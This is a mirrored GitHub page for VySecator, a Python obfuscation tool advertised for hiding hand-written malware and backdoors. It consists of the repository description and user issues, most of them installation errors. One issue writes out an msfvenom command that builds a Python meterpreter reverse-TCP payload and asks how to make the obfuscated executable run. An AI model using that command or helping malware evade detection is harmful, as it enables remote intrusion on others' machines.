Coder Social home page Coder Social logo

vedant-bhalgama / vysecator Goto Github PK

View Code? Open in Web Editor NEW
72.0 6.0 12.0 18.85 MB

VySecator Is a Python Script Obfuscation Tool, Which can be used to Obfuscate your hand written Malwares and your Hand Written Scripts!

Python 100.00%
python-payloads python vysecator wine hackers python-script backdoor obfuscation obfuscate-code python-obfuscation-github

vysecator's Introduction

💫 About Me:

Hi! Myself Vedant, I'm passionate about cybersecurity! My areas of interests are :

  • 🖥️ Red Teaming
  • 🤓 Penetration Testing
  • 🕷️ Malware Development and Research Stuff
  • 🔎 Malware Analysis

🌐 Socials:

Discord Twitter YouTube

💻 Tech Stack:

C C++ Python

🐦 Latest Tweet


vysecator's People

Contributors

vedant-bhalgama avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar

vysecator's Issues

i can'tuse the tool

when i choice the third that tell me
VySec>: Please enter script path --> /home/koro/kage/hi.apk
Traceback (most recent call last):
File "./VySec.py", line 83, in
ask_user_choice()
File "./VySec.py", line 73, in ask_user_choice
subprocess.call(['wine', '/root/.wine/drive_c/Python27/Scripts/pyarmor.exe', 'pack', '-e', '--onefile --noconsole', ask_path])
File "/usr/lib/python2.7/subprocess.py", line 172, in call
return Popen(*popenargs, **kwargs).wait()
File "/usr/lib/python2.7/subprocess.py", line 394, in init
errread, errwrite)
File "/usr/lib/python2.7/subprocess.py", line 1047, in _execute_child
raise child_exception
OSError: [Errno 2] No such file or directory

Capture d’écran_2020-08-06_02-51-33

installation issue

VySecator$ python3 setup.py
Requirement already satisfied: colorama in /usr/lib/python3/dist-packages (0.4.3)
Requirement already satisfied: pyfiglet in /usr/lib/python3/dist-packages (0.8.post0)
Traceback (most recent call last):
File "setup.py", line 55, in
setup()
File "setup.py", line 19, in setup
asc = pyfiglet.figlet_format("VySecator Setup")
NameError: name 'pyfiglet' is not defined

I HAVE THIS PROBLEM

obfuscated exe not executing

Hey Vedant,
I created a basic python payload using msfvenom
"msfvenom -p python/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx > abc.py"
after that I used Vysecator to obfuscate the payload, I used option 3 that is "obfuscate & convert to exe"
after conversion when I execute the obfuscated payload its show an error "Failed to execute script".
can u help & show any workaround here?

error_message = Fore.R

root@kali:/opt/VySecator# python setup.py
DEPRECATION: Loading egg at /usr/local/lib/python3.11/dist-packages/pex-2.1.145-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
DEPRECATION: Loading egg at /usr/local/lib/python3.11/dist-packages/ghost-8.0.0-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
Requirement already satisfied: colorama in /usr/lib/python3/dist-packages (0.4.6)
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
DEPRECATION: Loading egg at /usr/local/lib/python3.11/dist-packages/pex-2.1.145-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
DEPRECATION: Loading egg at /usr/local/lib/python3.11/dist-packages/ghost-8.0.0-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
Requirement already satisfied: pyfiglet in /usr/lib/python3/dist-packages (0.8.post0)
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
Traceback (most recent call last):
File "setup.py", line 14, in
error_message = Fore.RED
NameError: name 'Fore' is not defined

Hay 2 errores

Error 1 : En la línea 55 módulo setup()

Error 2 : Línea 27 'raw_input' no está definido

Nota: El script se ejecuta, aparece el banner pero cuando dice que espere un momento hay sale el error. Espero y lo pueda solucionar ya que estaba en busca de una herramienta para ofuscar un archivo y está fue la única que encontré y me pareció muy buena pero lástima que sale ese error.

Doubt in the code

In line number 57 the code is:
subprocess.call(['wine', '/root/.wine/drive_c/Python27/Scripts/pyinstaller', '--onefile', '--noconsole', '--icon', ask_icon_path, ask_path])
Should it be :
subprocess.call(['wine', '/root/.wine/drive_c/Python27/Scripts/pyinstaller.exe', '--onefile', '--noconsole', '--icon', ask_icon_path, ask_path])

I'm having trouble with the installation

When installing python2.7.14. I got python 2.7.14 (64-bit) setup ended prematurely because an error. Your system has not be modified. To install the program at a later time. Please run install again.
This was when I ran setup.py

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.